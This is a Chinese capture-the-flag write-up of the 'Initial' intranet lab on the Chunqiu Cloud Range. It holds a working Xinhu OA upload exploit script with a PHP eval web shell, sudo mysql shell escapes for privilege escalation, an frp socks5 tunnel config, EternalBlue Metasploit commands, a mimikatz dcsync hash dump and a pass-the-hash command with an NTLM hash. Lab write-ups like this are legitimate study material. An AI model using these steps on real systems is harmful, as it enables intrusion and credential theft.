春秋云境-initial

春秋云景initial–wp

靶场描述:Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

拿到站点，先进行信息收集，fscan扫一遍，发现thinkphp漏洞cve

flag1

上thinkphp框架利用工具，

getshell连接yijian

查看一下权限，发现是www-data权限，该权限下无法读取根目录的文件

看一下有没有可用的suid提权

find / -perm -u=s -type f 2>/dev/null

一般如果有以下这些，是可以用来提权的

• nmap
  vim
  find
  bash
  more
  less
  nano
  cp
  没有就考虑sudo提权
  
  ```bash
  sudo -l #列出当前用户（或指定用户）可以使用 sudo 执行的命令
  

发现可用的/usr/bin/mysql

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null' #查找flag文件

sudo mysql -e '\! cat /root/flag/flag01.txt'
#mysql -e参数后面可以跟sql命令，\!告诉mysql后面跟的是shell命令
#-type f: 限制查找结果只包括文件（不包括目录、符号链接等）。
#2>/dev/null: 将标准错误（stderr）重定向到 /dev/null 不会再出现错误信息

拿到flag的第一部分

flag2

ifconfig一下

老套路，上传fscan进行扫描内网，然后传frp内网流量转发

./fscan32 -h 172.22.1.0/24 > result.txt
#单单执行命令可能会不回显，可以将结果重定向到result.txt中

发现内部资产

发现172.22.1.2是个DC域控

172.22.1.21开放了445端口，可能有永恒之蓝漏洞

172.22.1.18 信呼OA系统，可以去找对应的cve漏洞

上传frp搭建流量转发

注：frp的选取很重要，linux有对应linux的版本，windows有对应windwos的版本，而且不建议用更新后的toml后缀的frpc和frps，容易失败

本次实验用的frp_0.37.0_linux_amd64

链接在这Releases · fatedier/frp

下面给到frpc.ini的配置，不要在配置local_ip和local_port了，因为我们转发的是流量，而不是进行一个端口的映射，如果具体到某个端口，那通过我们vps的流量也只能访问到对应的端口，这显然是我们不想接受的。

[common]
server_addr = vps_ip  #vps的公网ip，不能是自己kali虚拟机
server_port = 7001    #frps服务器的监听端口

[ssh]
type = tcp
remote_port = 6060   #frps的流量转发端口
plugin = socks5      #采用socks5协议

成功访问内网，发现172.22.1.18是一个信呼协同办公系统

可以弱密码admin/admin123登陆进去

网上搜一下可以看到好多个信呼的cve

可以手工，也可以直接打poc

import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
    'rempass': '0',    #0表示不记住密码
    'jmpass': 'false', 
    'device': '1625884034525', #设备id
    'ltype': '0',             #登陆类型
    'adminuser': 'YWRtaW4=::', #账号admin的base64编码
    'adminpass': 'YWRtaW4xMjM=', #密码admin123的base64编码
    'yanzm': ''  #验证码 空
}
r = session.post(url1, data=data1)  #使用session对象发送post数据
r = session.post(url2, files={'file': open('1.php', 'r+')}) #上传1.php文件，里面有一句话马
filepath = str(r.json()['filepath']) #从上传成功的响应中提取文件路径，1.php应该是会上传成功的，但是因为不在白名单里，后缀会被改正.uptemp
filepath = "/" + filepath.split('.uptemp')[0] + '.php' #将临时后缀.uptemp改为.php后缀 
id = r.json()['id'] #上传成功的响应中提取文件的 ID
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}' #用文件的id去访问，可以实现.php后缀的恢复
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath) #打印出一句话马的路径，方便yijian连接

同时在同目录下创建一个php一句话木马

<?php eval($_POST["a"]);?>

先配置一下proxychains的代理，改成我们公网服务器对应端口的socks5代理

vim /etc/proxychains4.conf

proxychains python3 exppp.py

yijian配置sock5代理连接

由于进去就是system权限，可以直接去翻管理员目录下的文件，

拿到flag2:2ce3-4813-87d4-

而且提示去打dc机，也就是172.22.1.2

flag3

之前用fscan扫的时候，看到172.22.1.21开放了445端口，先试试有没有永恒之蓝漏洞

proxychains msfconsole  #用proxychain代理开启msfconsole
search ms17_010 #寻找永恒之蓝相关的攻击或者辅助模块
use exploit/windows/smb/ms17_010_eternalblue  #使用eternalblue模块，之后会提示选择攻击载荷payload，可以选择正向还是反向连接
set payload windows/x64/meterpreter/bind_tcp_uuid  #正向连接
set RHOSTS 172.22.1.21  #目标ip
exploit

成功拿下172.22.1.21

拿到meterpreter后的下一步的思路就是就是用mimikatz抓取哈希值

调用kiwi模块里的mimikatz模块

然后抓取哈希值

load kiwi #导入kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit  # 导出域内所有用户的信息(包括哈希值)
    #dcsync 命令模拟域控制器的行为，向其他域控制器请求复制域数据
    #后面接域名/domain:xiaorang.lab，后面接/all说明要复制所有用户的密码哈希值
    #/CSV，指定输出格式为csv
    #exit，及时退出mimikatz界面

获得密码哈希值进行横向移动，访问域内的其他用户，先访问域控主机172.22.1.2

proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
#crackmapexec smb 指定使用 CME 的 SMB 模块，该模块用于与 Windows 系统的 SMB 服务进行交互。
#-u -H -d 分别对应用户名，用户密码hash值，域名	
#-x选项告诉crackmapexec，在目标系统上执行windows命令，用type读取flag3

成功拿到flag03: e8f88d0d43d6}